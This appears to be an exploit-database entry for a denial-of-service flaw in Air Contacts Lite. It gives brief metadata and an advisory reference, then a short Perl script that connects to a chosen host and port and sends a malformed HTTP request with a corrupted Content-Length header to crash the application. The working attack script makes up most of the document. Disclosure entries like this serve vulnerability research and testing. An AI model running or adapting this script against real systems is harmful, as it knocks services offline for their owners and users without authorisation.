Air Contacts Lite - HTTP Packet Denial of Service

Author: Rodrigo Escobar
type: dos
platform: multiple
port: 
date_added: 2011-02-09 
date_updated: 2014-12-02 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/46827/info

Air Contacts Lite is prone a denial-of-service vulnerability.

Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition.

#!/usr/bin/perl
use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request...\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.example.com. HTTP/1.1\r\n";
      print $socket "Host: http://www.example.com.\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";

sub usage() {
      print "[-] example - Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
}